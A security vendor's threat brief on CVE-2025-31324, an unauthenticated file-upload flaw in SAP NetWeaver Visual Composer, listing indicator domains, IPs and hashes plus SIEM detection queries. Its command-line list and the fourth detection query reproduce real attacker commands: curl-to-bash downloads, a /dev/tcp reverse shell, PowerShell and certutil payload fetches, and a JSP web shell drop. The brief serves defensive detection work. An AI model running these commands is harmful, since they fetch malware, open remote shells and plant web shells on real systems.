Threat Brief: CVE-2025-31324

    Tuesday, May 13, 2025 In: Threat Research Print

    Date: 05/13/2025

    Severity: Medium

    Summary

    On April 24, 2025, SAP disclosed CVE-2025-31324, a critical vulnerability (CVSS 10.0) in SAP NetWeaver’s Visual Composer Framework (version 7.50). This flaw allows unauthenticated attackers to upload arbitrary files via the /developmentserver/metadatauploader endpoint, potentially leading to remote code execution and full system compromise. Incident response findings revealed attackers deploying web shells (e.g., helper.jsp, cache.jsp), reverse shells, and reverse SSH SOCKS proxies for persistent access.

    Indicators of Compromise (IOC) List

    URL/Domains

    ocr-freespace.oss-cn-beijing.aliyuncs.com

    overseas-recognized-athens-oakland.trycloudflare.com

    d-69b.pages.dev

    IP Address

    205.169.39.55

    206.188.197.52

    65.49.235.210

    108.171.195.163

    47.97.42.177

    45.76.93.60

    158.247.224.100

    31.192.107.157

    107.173.135.116

    192.3.153.18

    188.166.87.88

    223.184.254.150

    51.79.66.183

    85.106.113.168

    138.68.61.82

    101.99.91.107

    103.207.14.195

    13.232.191.219

    Hash

    df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049

    9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d

    c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28

    3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5

    598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0

    888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef

    5919F2EAB8A826D7BA84E6C413626F5D11ED412D7DF0D3AB864F31D3A8DB3763

    5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e

    427877aadd89f427e1815007998d9bb88309c548951a92a6e4064df001e327c2

    69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75

    b9ef95ca541d3e05a6285411005f5fee15495251041f78e715234b09d019b92c

    1abf922a8228fd439a72cfddf1ed08ea09b59eaa4ae5eeba1d322d5f3e3c97e8

    2e6f348f8296f4e062c397d2f3708ca6fdeab2c71edfd130b2ca4c935e53c0d3

    6c6c984727dc53af110ed08ec8b15092facb924c8ad62e86ec76b52a00a41a40

    4b17beee8c2d94cf8e40efc100651d70d046f5c14a027cf97d845dc839e423f9

    7aab6ec707988ff3eec37f670b6bb0e0ddd02cc0093ead78eb714abded4d4a79

    b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee

    Commandline

    curl 138.68.61.82|bash

    bash -i >& /dev/tcp/138.68.61.82/4544 0>&1

    curl -sk hxxps://overseas-recognized-athens-oakland.trycloudflare.com/v2.js || wget --no-check-certificate -q -O - hxxps://overseas-recognized-athens-oakland.trycloudflare.com/v2.js) | bash -sh

    powershell Invoke-WebRequest -Uri "hxxp://31.192.107.157:38205/ReportQueue.exe" -OutFile "C:\programdata\ReportQueue.exe"

    powershell Invoke-WebRequest -Uri "hxxp://158.247.224.100:38205/EACA38DB.tmp" -OutFile "C:\programdata\EACA38DB.tmp"

    powershell curl -o "C:\users\public\ansgdhs.bat" hxxp://101.32.26.154/rymhNszS/ansgdhs.bat

    powershell IEX(New-Object Net.WebClient).DownloadString('hxxps://d-69b.pages.dev/sshb64.ps1')

    certutil.exe -urlcache -split -f hxxp://108.171.195.163:8000/$FILE_NAME$.txt ~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp

    powershell (new-object Net.WebClient).DownloadFile('hxxp://108.171.195.163:8000/$FILE_NAME$.txt ,'~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp')

    powershell Invoke-WebRequest -Uri "hxxp://65.49.235.210/download/2.jpg" -OutFile "cmake.exe"

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1

    domainname like "ocr-freespace.oss-cn-beijing.aliyuncs.com" or siteurl like "ocr-freespace.oss-cn-beijing.aliyuncs.com" or url like "ocr-freespace.oss-cn-beijing.aliyuncs.com" or domainname like "overseas-recognized-athens-oakland.trycloudflare.com" or siteurl like "overseas-recognized-athens-oakland.trycloudflare.com" or url like "overseas-recognized-athens-oakland.trycloudflare.com" or domainname like "d-69b.pages.dev" or siteurl like "d-69b.pages.dev" or url like "d-69b.pages.dev"

    Detection Query 2

    dstipaddress IN ("138.68.61.82","205.169.39.55","206.188.197.52","65.49.235.210","31.192.107.157","108.171.195.163","47.97.42.177","45.76.93.60","158.247.224.100","107.173.135.116","192.3.153.18","188.166.87.88","223.184.254.150","51.79.66.183","85.106.113.168","101.99.91.107","103.207.14.195","13.232.191.219") or srcipaddress IN ("138.68.61.82","205.169.39.55","206.188.197.52","65.49.235.210","31.192.107.157","108.171.195.163","47.97.42.177","45.76.93.60","158.247.224.100","107.173.135.116","192.3.153.18","188.166.87.88","223.184.254.150","51.79.66.183","85.106.113.168","101.99.91.107","103.207.14.195","13.232.191.219")

    Detection Query 3

    sha256hash IN ("5919F2EAB8A826D7BA84E6C413626F5D11ED412D7DF0D3AB864F31D3A8DB3763","888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef","598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0","b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee","5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e","df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049","9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d","c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28","3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5","427877aadd89f427e1815007998d9bb88309c548951a92a6e4064df001e327c2","69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75","1abf922a8228fd439a72cfddf1ed08ea09b59eaa4ae5eeba1d322d5f3e3c97e8","2e6f348f8296f4e062c397d2f3708ca6fdeab2c71edfd130b2ca4c935e53c0d3","6c6c984727dc53af110ed08ec8b15092facb924c8ad62e86ec76b52a00a41a40","4b17beee8c2d94cf8e40efc100651d70d046f5c14a027cf97d845dc839e423f9","7aab6ec707988ff3eec37f670b6bb0e0ddd02cc0093ead78eb714abded4d4a79")

    Detection Query 4

    commandline IN ("curl 138.68.61.82|bash","bash -i >& /dev/tcp/138.68.61.82/4544 0>&1","curl -sk https://overseas-recognized-athens-oakland.trycloudflare.com/v2.js || wget --no-check-certificate -q -O - https://overseas-recognized-athens-oakland.trycloudflare.com/v2.js) | bash -sh","powershell Invoke-WebRequest -Uri \"http://31.192.107.157:38205/ReportQueue.exe\" -OutFile \"C:\\programdata\\ReportQueue.exe\"","powershell Invoke-WebRequest -Uri \"http://158.247.224.100:38205//EACA38DB.tmp\" -OutFile \"C:\\programdata\\EACA38DB.tmp\"","powershell curl -o \"C:\\users\\public\\ansgdhs.bat\" http://101.32.26.154/rymhNszS/ansgdhs.bat","powershell IEX(New-Object Net.WebClient).DownloadString('hxxps://d-69b.pages.dev/sshb64.ps1')","certutil.exe -urlcache -split -f hxxp://108.171.195.163:8000/$FILE_NAME$.txt ~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp","powershell (new-object Net.WebClient).DownloadFile('hxxp://108.171.195.163:8000/$FILE_NAME$.txt ,'~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp')","powershell Invoke-WebRequest -Uri \"http://65.49.235.210//download//2.jpg\\" -OutFile \"cmake.exe\"")

    Reference:  

    https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/


    Tags

    VulnerabilityCVE-2025SAP NetWeaverweb shellreverse shellreverse proxy

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.